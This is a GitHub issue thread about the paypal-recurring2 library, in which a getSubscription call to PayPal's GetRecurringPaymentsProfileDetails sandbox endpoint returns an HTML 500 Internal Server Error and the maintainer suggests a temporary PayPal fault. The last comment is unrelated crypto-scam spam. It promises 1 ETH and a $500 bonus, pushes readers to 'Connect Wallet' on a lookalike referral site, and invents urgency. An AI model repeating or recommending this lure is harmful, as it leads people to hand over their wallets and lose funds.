### ISSUE TITLE
getSubscription failing with error 500

### ISSUE THREAD

**Issue by fiatjaf** [uncedric/paypal-recurring2#6]
In fact, `getSubscription` doesn't return anything and the callback is never called, but doing the call directly through `makeAPIrequest` gives me this:

```
coffee> params
{ USER: 'myuser',
  PWD: 'mypassword',
  SIGNATURE: 'mysignature',
  VERSION: 94,
  METHOD: 'GetRecurringPaymentsProfileDetails',
  PROFILEID: 'avalidprofileid' }
coffee> paypal.makeAPIrequest(params, console.log.bind console)
coffee> 
coffee> # here more than a minute passes while I wait for the response
coffee> 
coffee> { '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator,\n ppmtps@paypal.com and inform them of the time the error occurred,\nand anything you might have done that may have\ncaused the error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache Server at <a href': '"mailto:ppmtps@paypal.com">api-3t.sandbox.paypal.com</a> Port 443</address>\n</body></html>\n' } null
```

The error string in a readable format:

> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator,\n ppmtps@paypal.com and inform them of the time the error occurred,\nand anything you might have done that may have\ncaused the error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache Server at <a href': '"mailto:ppmtps@paypal.com">api-3t.sandbox.paypal.com</a> Port 443</address>\n</body></html>\n

This API endpoint does not work anymore? What is happening? According to https://developer.paypal.com/docs/classic/api/merchant/GetRecurringPaymentsProfileDetails_API_Operation_NVP/ everything should be ok.

**Comment by uncedric** [comment]
I don't know if it is the same issue, but some months ago when I was working I found a similar error, it happened to be PayPal's fault and it was fixed magically some days later. If it was an error related to our request it would send "Bad request" and not "Internal server error", does it makes sense to you?

**Comment by fiatjaf** [comment]
Yes, I perfectly understood the fault is on Paypal's side, but I thought you might know better than me what did that mean. For example, the API call could have been deprecated or something like this.

If the PROFILEID I've sent was wrong the error message would show me that, right?

**Comment by uncedric** [comment]
yup :) I think so

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
